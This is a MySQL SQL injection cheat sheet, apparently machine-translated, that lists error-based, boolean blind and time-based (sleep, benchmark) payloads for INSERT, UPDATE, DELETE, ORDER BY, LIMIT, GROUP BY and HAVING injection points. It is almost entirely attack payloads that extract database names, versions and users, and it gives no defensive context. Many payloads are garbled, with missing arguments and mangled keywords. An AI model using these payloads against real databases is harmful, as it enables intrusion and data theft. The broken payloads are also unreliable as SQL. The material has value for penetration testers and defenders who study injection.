Mysql Insert, Update, Delete, Order by, Group by injection

Insert:

Syntax: INSERT into table_name (column 1, column 2,...) Values (value 1, value 2,....)

Error injection:

INSERT into Test (Id,name,pass) VALUES (6, ' Xiaozi ' or Updatexml (1,concat (0x7e, (Database ()), 0x7e), 0) or ' ', ' Nervo ');

INSERT into Test (Id,name,pass) VALUES (6, ' Xiaozi ' or Extractvalue (1,concat (0x7e,database ())) or ', ' Nervo ');

Blind Note:

Blind based on whether an expression between or is formed
' or 1=1 or '//the inserted test statement executes directly as a SQL statement and stores the return value, the expression is set, and the result is 1
' or 1=2 or '//expression not valid, return result is 0
' or exists (SELECT * from Information_schema.tables) or '//return result is 1
AAA ' or Length (database ()) =11 or '//return correct
AAA ' or Mid (Database (), +) = ' t ' or '//return correct
AAA ' or Mid (Database (), 1,11) = ' test ' or '//return correct

INSERT into Test (Id,name,pass) VALUES (2, ' mis1 ', ' or ASCII (Mid (Database (),)) =116 or ')

Time Blind:

INSERT into Test (Id,name,pass) VALUES (2, ' mis1 ', ' or if (Mid (Database (), max) = ' A ', Sleep (), 0) or ')

Update:

Update test set pass= ' Baidu ' or Updatexml (1,concat (0x7e, (version ()), 0x7e), 0) or ' WHERE id=2 and name= ' 0 ';

Update test set pass= ' Baidu ' or Extractvalue (1,concat (0x7e,database ())) or ' WHERE id=2 and name= ' 0 ';

Delete:

DELETE from Test WHERE id=2 or Updatexml (1,concat (0x7e, (version ()), 0x7e), 0) or ';

DELETE from Test WHERE id=2 or Extractvalue (1,concat (0x7e,database ())) or ';

Order by:

ORDER BY [ID]---"Injection point"

Select username from the users WHERE isadmin = 0 GROUP by username ORDER by 1 and (SELECT COUNT (*) from information_schema.co Lumns GROUP BY Concat (version (), 0x27202020,floor (rand (0) *2-1))

ORDER BY [ID] DESC/ASC---"Injection point"

　　

Limit 0, 1:

Select field from table WHERE ID > 0 ORDER by ID LIMIT "injection point"

Error injection:

mysql> SELECT field from the user WHERE ID >0 ORDER by ID LIMIT procedure Analyse (Extractvalue (rand (), concat (0x3a,ve Rsion ())), 1);  

If the injection point is not an error, you can also use time-based injection, payload as follows:

SELECT username from users WHERE isadmin = 0 Limit 0,1 procedure analyse (Extractvalue (rand (), Concat (0x3a, (IF () (MID (Database (), BENCHMARK) like ' W ', 5000000,SHA1 (1), 5))), 1);  

　　

Group by:

GROUP BY username--"injection point"

Select username from the users WHERE isadmin = 0 GROUP by username and (select 1 from (SELECT COUNT (*), concat (SELECT ( SELECT distinct concat (0x7e,schema_name,0x7e) from Information_schema.schemata LIMIT 0,1) from Information_ Schema.tables limit 0,1), floor (rand (0) *) x from Information_schema.tables Group by X) a) #

　　

Having:

Having 1=1--"injection point"

Select username from the users WHERE isadmin = 0 GROUP by username have  1=1 and (SELECT COUNT (*) from INFORMATION_SCHEMA . Columns GROUP BY CONCAT (version (), 0x27202020,floor (rand (0) *2-1))

　

MySQL Error injection:

1, through floor error

and (select 1 from (SELECT COUNT (*), concat (version (), Floor (rand (0))) x from Information_schema.tables Group by x);

and (select COUNT (*) from (select 1 union SELECT, NULL Union SELECT! 1) x GROUP BY CONCAT (select table_name from Informatio N_schema.tables limit 1), Floor (rand (0)));

2, Extractvalue

and Extractvalue (1, concat (0x5c, (select User ())))

3, Updatexml

and 1= (Updatexml (1,concat (0x3a, (select User ())), 1))

4, using Name_const injection

and exists (Select*from (Select*from (select Name_const (@ @version, 0)) A join (select Name_const (@ @version, 0)) b) c)

5, join Error injection

Mysql> SELECT * FROM (SELECT * from users a join users B) C;
Mysql> SELECT * FROM (SELECT * from users a join users B using (ID)) C;

Mysql> SELECT * FROM (SELECT * from users a join users B using (id,name)) C;

MySQL Blind Note:

#select * FROM test where ID =2 and length (version ()) =6
#select * FROM test where ID =2 and ASCII (substring (version (), 7,1)) >1

#select * FROM test where ID =2 and length (Database ()) =4
#select * FROM test where ID =2 and ASCII (Mid (Database (), 4, 1)) =116

#select * FROM test where ID =2 and (select Length (version ())) =6
#select * FROM test where ID =2 and (SELECT COUNT (*) from test) =3

MySQL Time blind Note:

#select * FROM test where ID =2 and if (ASCII (substring (user ())) =114,benchmark (10000000,SHA1 (1)), 0)
#select * FROM test where ID =2 and if (ASCII (substring (user ())) =114,sleep (1), 0)

#select * FROM test where ID =2 and if (substring (user (), () = ' R ', Sleep (5), 0)
#select * FROM test where ID =2 and if (substring (user (), =char), Sleep (5), 0)

Resources:

1. mysql Error injection principle analysis (count (), Rand (), GROUP by)

2, about the MySQL injection process of five kinds of error methods and specific use cases

3, using insert,update and delete injection to obtain data

4, testing injection

5. mysql Injection summary

Mysql Insert, Update, Delete, Order by, Group by injection